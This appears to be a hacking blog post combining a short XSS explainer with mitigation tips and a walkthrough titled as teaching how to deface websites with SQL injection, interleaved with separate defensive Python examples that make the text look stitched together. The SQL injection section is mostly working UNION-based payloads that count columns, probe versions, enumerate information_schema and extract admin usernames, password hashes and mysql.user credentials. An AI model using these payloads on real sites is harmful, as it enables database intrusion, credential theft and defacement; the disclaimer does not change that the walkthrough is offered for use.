Cross-Site Scripting (XSS) is a form of security vulnerability typically found in web applications. XSS attacks enable attackers to inject malicious scripts into web pages viewed by other users. XSS attacks are one of the most prevalent forms of web attack, accounting for an astonishing 12.75% of all web attacks.

What Is Cross-Site Scripting (XSS)?

XSS is a security abbreviation for Cross Site Scripting. Prominent sites affected by XSS attacks in the past include Twitter, Facebook, MySpace and YouTube. In recent years, XSS vulnerabilities have become one of the most frequently exploited security vulnerabilities. Approximately 70% of all web vulnerabilities are XSS related.

How Does An XSS Attack Work?

Step #1: Hackers design a malicious script, usually with the purpose of harvesting user data such as usernames, passwords or billing details.

Step #2: Hackers inject the malicious script into a legitimate website. The script acts as a layer hidden from the user, similar in concept to an illicit ATM skimmer.

Step #3: Hackers then receive the data sent back by the script, successfully harvesting user data.

Types Of XSS Attacks

1. Reflected Attack (Type-II XSS / Non-Persistent XSS): A reflected attack is one where the injected script is reflected off the web server in a response, such as a search result, error message or other response that includes part of the input sent in the request. Reflected attacks reach users by a different route, often delivered in emails or hidden links. The browser executes the code because it appears to come from a 'trusted' server.

2. Stored Attack (Type-I XSS / Persistent XSS): A stored attack is one where the injected script is stored on the target server, for example in a comment, database or forum post. The script is then executed whenever a legitimate user visits the affected page.

XSS Attack Statistics

Mitigation

1. Blacklisting & Whitelisting: Two very basic techniques you can use to sanitize incoming data, comparable to using parameterized inputs to mitigate SQL injection attacks. Whitelisting uses a list of approved data, and only data matching that list is accepted. Whitelisting is the more secure of the two. Blacklisting uses a list of prohibited data that is excluded from execution.

2. Application Security: At its core, Barricade works like an early warning system against any attempts at breaching the security of your servers. By using attack mitigation products like Barricade you can be a step ahead of the game. Barricade quietly watches in the background and can identify security threats. In the event that there is any serious activity, Barricade notifies you and provides detailed steps to resolve the situation.
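To make the whitelisting and output-encoding advice concrete, here is an added Python example that is not part of the original article: a reflected search page rendered once with unfiltered input, once with HTML output encoding only, and once with an allowlist check plus encoding. The search string, the allowlist pattern and the function names are assumptions made for this example.

```python
import html
import re

# Constructed sample input for the example: a search term carrying the kind of
# script an attacker would try to reflect back to other users.
SAMPLE_QUERY = "shoes<script>alert(document.cookie)</script>"

# Allowlist (whitelist) of what a search term may look like: letters, digits,
# spaces and a few punctuation marks, at most 64 characters. Everything else is
# rejected outright instead of being "cleaned".
ALLOWED_QUERY = re.compile(r"[A-Za-z0-9 ,.\-_']{1,64}")


def is_allowed_query(query: str) -> bool:
    """Allowlist validation: True only for input that matches the approved shape."""
    return ALLOWED_QUERY.fullmatch(query) is not None


def render_unsafe(query: str) -> str:
    """Vulnerable reflection: the raw query is pasted into the HTML response."""
    return f"<p>Results for: {query}</p>"


def render_encoded(query: str) -> str:
    """Output encoding only: every HTML-significant character is escaped, so the
    browser shows the script tag as text instead of executing it. This is also
    the defence that covers stored XSS, where the value comes from the database."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def render_safe(query: str) -> str:
    """Defence in depth: allowlist on input, encode on output."""
    if not is_allowed_query(query):
        return "<p>Results for: (search term rejected)</p>"
    return render_encoded(query)


if __name__ == "__main__":
    for fn in (render_unsafe, render_encoded, render_safe):
        print(fn.__name__, "->", fn(SAMPLE_QUERY))
```

Encoding at the point of output is the control that works for both reflected and stored XSS; the allowlist is an extra layer for fields whose legitimate values have a known shape, and a blacklist of "bad" strings is neither.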

Note: This guide is for knowledge purposes only and shouldn't be used for any illegal activities; we are not responsible for anything that happens as a result.

Hope HACKAGON has provided some healthy knowledge about XSS attacks. So, stay secure and keep learning, and if you like this article then don't forget to share it with your friends, and always feel free to drop a comment below if you have any query or feedback.


SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (for example, to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example when user input is incorrectly filtered for string-literal escape characters embedded in SQL statements, or when user input is not strongly typed and is unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. So, let's learn how to deface websites using SQL injection with HACKAGON.

SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
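The root cause described above (input that is neither filtered for string-literal escape characters nor strongly typed) is easiest to see side by side with the fix. The following Python example is added here and is not part of the original article or of any real site's code: it uses an in-memory SQLite table named news as a stand-in for the site's database, and the handler and helper names are assumptions. The vulnerable handler reproduces the symptom the walkthrough below relies on (a stray quote produces a database error), while the hardened handler enforces the integer type and binds the value as a parameter.

```python
import sqlite3

# Constructed in-memory database standing in for the site's news table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
conn.executemany(
    "INSERT INTO news VALUES (?, ?, ?)",
    [(1, "Welcome", "first post"), (2, "Update", "second post")],
)


def fetch_news_unsafe(id_param: str):
    """Vulnerable: the query-string value is concatenated straight into SQL,
    so a quote or any SQL keyword in it becomes part of the statement."""
    sql = f"SELECT id, title FROM news WHERE id = {id_param}"
    return conn.execute(sql).fetchall()


def fetch_news_safe(id_param: str):
    """Hardened: enforce the expected type first, then bind the value as a
    parameter so the database never parses it as SQL."""
    try:
        news_id = int(id_param)
    except ValueError:
        return []  # not a number: reject it instead of building SQL from it
    return conn.execute(
        "SELECT id, title FROM news WHERE id = ?", (news_id,)
    ).fetchall()


def raises_sql_error(fetcher, id_param: str) -> bool:
    """True if the handler throws a database error for this input. A visible
    error of this kind is the signal an attacker probes for, so a hardened
    page should return a generic message rather than the driver's text."""
    try:
        fetcher(id_param)
        return False
    except sqlite3.Error:
        return True


if __name__ == "__main__":
    print("unsafe, id=1  :", fetch_news_unsafe("1"))
    print("unsafe, id=1' :", "error" if raises_sql_error(fetch_news_unsafe, "1'") else "ok")
    print("safe,   id=1' :", fetch_news_safe("1'"))
```

The same two controls (type enforcement and parameter binding) apply unchanged to PHP with mysqli or PDO prepared statements; what matters is that the user-supplied value is never spliced into the SQL text.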

What Is Website Defacement?

Website defacement is an attack on a website that changes the visual appearance of the site or of a web page. These are typically the work of system crackers who break into a web server and replace the hosted website with one of their own. Defacement is generally meant as a kind of electronic graffiti and, like other forms of vandalism, is also used to spread messages by politically motivated "cyber protesters" or "hacktivists".

Defacing a website simply means replacing the site's index.html file with the attacker's own file. All users who open the website will then see the page uploaded by the attacker.

Steps To Deface Websites Using SQL Injection:

1) Vulnerability Check:

To check whether a website is vulnerable to SQL injection, you need to find a page with a URL that looks like this –
http://www.website.com/news.php?id=1

Now, to test whether it's vulnerable, we add a ' (single quote) to the end of the URL, so that it looks like –
http://www.website.com/news.php?id=1'

If the database is vulnerable, the page will return a MySQL error similar to –
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…"

That means the site is vulnerable to SQL injection; if the page loads as normal, then the website is not vulnerable to SQL injection.

2) Finding the number of columns:

To find the number of columns in the query, we'll use the ORDER BY statement, which tells the database how to order the result. We just increment the number until we get an error.

http://www.website.com/news.php?id=1 order by 1/*      <-- No Error
http://www.website.com/news.php?id=1 order by 2/*      <-- No Error
http://www.website.com/news.php?id=1 order by 3/*      <-- No Error
http://www.website.com/news.php?id=1 order by 4/*      <-- Error

We'll get a message like "Unknown column '4' in 'order clause'", or something similar, which means there are 3 columns, since we got an error on 4.

3) Check for the UNION function:

We now use the UNION command to find the vulnerable columns, because with UNION we can select more data in one SQL statement. So we have –
http://www.website.com/news.php?id=1 union all select 1,2,3/* (we already found in the second step that the number of columns is 3.)

If we see some of the numbers on the screen, i.e. 1, 2 or 3, then the UNION works.

4) Check for DataBase Version:

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following functions:
user()
database()
version()
Or, if these don't work, try:
@@user
@@version
@@database

The URL would look like:
http://www.website.com/news.php?id=1 union all select 1,user(),version(),3/*

If you get the error "union + illegal mix of collations (IMPLICIT + COERCIBLE) …", then what we need is the convert() function (I didn't see any website article covering this problem, so I must cover it).

i.e. http://www.website.com/news.php?id=1 union all select 1,convert(@@version using latin1),3/*

Or with hex() and unhex():

i.e. http://www.website.com/news.php?id=1 union all select 1,unhex(hex(@@version)),3/*

The resulting page would then show the database user and the MySQL version, for example admin@localhost and MySQL 5.0.83.

IMPORTANT: If the version is 5 or above, read on to carry out the attack; if it is 4 or below, you have to brute force or guess the table and column names (programs can be used to do this).

5) Obtaining Table And Column Name:

In this step we aim to list all the table names in the database. The table_name goes in the vulnerable column number you found earlier. If the command is entered correctly, the page should show all the tables in the database; look for tables that may contain useful information such as passwords, i.e. admin, member or user tables. In most cases, however, we must guess the table and column names.

Common table names are: user/s, admin/s, member/s, etc.

Common column names are: username, user, usr, user_name, password, pass, passwd, pwd, etc.

The URL would be http://www.website.com/news.php?id=1 union all select 1,2,3 from admin/* (we see the number 2 on the screen like before, and that's good)

We know that the table admin exists. Now to check column names –

http://www.website.com/news.php?id=1 union all select 1, username, 3 from admin/* (if you get an error, then try another column name)

We get a username displayed on the screen, for example admin, superadmin, etc. Now to check whether the column password exists –
http://www.website.com/news.php?id=1 union all select 1, password, 3 from admin/* (if you get an error, then try another column name)

We'll see the password on the screen in hash or plain-text format; it depends on how the database is set up, i.e. md5 hash, mysql hash, sha1, etc.

Now we must complete the query to suit our needs. For that we can use the concat() function (it joins strings).
i.e. http://www.website.com/news.php?id=1 union all select 1, concat(username,0x3a,password),3 from admin/*

(Note: here I used 0x3a, the hex value for a colon.)
(Another way is to use the ASCII value for it, for example char(58).)

http://www.website.com/news.php?id=1 union all select 1,concat(username,char(58),password),3 from admin/*

Now we get username:password displayed on the screen, i.e. admin:admin or admin:HACKAGON

When you have this, you can log in as admin or some superuser. If you can't guess the right table name, you can always try mysql.user (default). It has user and password columns, so the URL would be
http://www.website.com/news.php?id=1 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6) In case of MySQL 5:

Everything up to step 5 is for MySQL versions < 5 (i.e. 4.1.33, 4.1.12, etc.). For MySQL 5 we need information_schema, which holds all tables and columns in the database. To get tables, we use table_name and information_schema.tables.
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables/*

Here we replace our number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the query to list all tables one at a time.
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
(Note: here I put 0,1, which returns 1 result starting from the 0th.)

Now to view the second table, we’ll change limit 0,1 to limit 1,1
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

The second table is displayed. Now for the third table, we put limit 2,1
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing the limit until you get some useful table like db_admin, poll_user, auth, auth_user, etc.

To get the column names, the method is the same, except that we use column_name and information_schema.columns. So the example would be –

http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is displayed. For the second one, we change limit 0,1 to limit 1,1
i.e. http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing the limit until you get something like username, user, login, password, pass, passwd, etc.

If you want to display the column names of a specific table, use a WHERE clause. Let's say we found the table users.
i.e. http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

Now the column names in table users are displayed. Using LIMIT we can list all columns in table users.

Note: This wouldn’t work if the magic quotes are ON.

Let's say we found the columns user, pass and email. Now complete the query to put them all together, using concat() as I did earlier.
i.e. http://www.website.com/news.php?id=1 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/

We'll get user:pass:email from the table users. Example: admin:hash:xyz@abc.com
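For the defending side, every probe the walkthrough above sends (a trailing quote that triggers an error, the incrementing ORDER BY, UNION ALL SELECT, information_schema lookups) lands in the web server's access log. The following Python example is added here and is not part of the original article: the log lines are constructed for the example using documentation IP ranges, and the signature names, the log format regex and the alert threshold are assumptions. It URL-decodes each request's query string, matches it against those patterns, and reports sources that produce a run of hits, while ignoring a benign search for "union station".

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (common log format) for the example; not from any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /news.php?id=1 HTTP/1.1" 200 5123
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /news.php?id=1%27 HTTP/1.1" 500 412
203.0.113.7 - - [10/Oct/2023:13:55:50 +0000] "GET /news.php?id=1%20order%20by%203/* HTTP/1.1" 200 5123
203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /news.php?id=1%20union%20all%20select%201,2,3/* HTTP/1.1" 200 5301
203.0.113.7 - - [10/Oct/2023:13:56:30 +0000] "GET /news.php?id=1%20union%20all%20select%201,table_name,3%20from%20information_schema.tables%20limit%200,1/* HTTP/1.1" 200 5290
198.51.100.4 - - [10/Oct/2023:13:57:00 +0000] "GET /news.php?id=2 HTTP/1.1" 200 4980
198.51.100.4 - - [10/Oct/2023:13:57:05 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 3000
"""

# Common log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures for the probes described in the article, applied to the URL-decoded
# query string. Each one requires SQL structure, not just a keyword, to limit noise.
SIGNATURES = [
    ("sql-comment", re.compile(r"/\*|--\s")),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("schema-enum", re.compile(r"information_schema\.|mysql\.user", re.I)),
    ("version-probe", re.compile(r"@@version|version\(\)|user\(\)|database\(\)", re.I)),
    ("concat-extract", re.compile(r"\bconcat\(", re.I)),
]


def analyze_log(text: str):
    """Return (ip, path, reasons) for every request whose query string matches a probe."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than guessing at them
        query = unquote_plus(urlsplit(m["path"]).query)
        reasons = [name for name, rx in SIGNATURES if rx.search(query)]
        # A quote in a parameter followed by a server error is the article's step 1 signal.
        if "'" in query and m["status"].startswith("5"):
            reasons.append("quote-then-server-error")
        if reasons:
            hits.append((m["ip"], m["path"], reasons))
    return hits


def suspicious_sources(text: str, threshold: int = 3):
    """IPs with at least `threshold` flagged requests: one hit may be noise, a run is a scan."""
    counts = {}
    for ip, _, _ in analyze_log(text):
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    for ip, path, reasons in analyze_log(SAMPLE_LOG):
        print(ip, path, ", ".join(reasons))
    print("scan sources:", suspicious_sources(SAMPLE_LOG))
```

Decoding the query string before matching matters because the probes arrive percent-encoded, and correlating hits per source over a short window is what separates a scan from a single odd request; in production the same logic belongs in a WAF rule or a SIEM correlation search rather than a script.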

Note: This guide is for knowledge purposes only and shouldn't be used for any illegal activities; we are not responsible for anything that happens as a result.

Hope you like this article. So, don’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.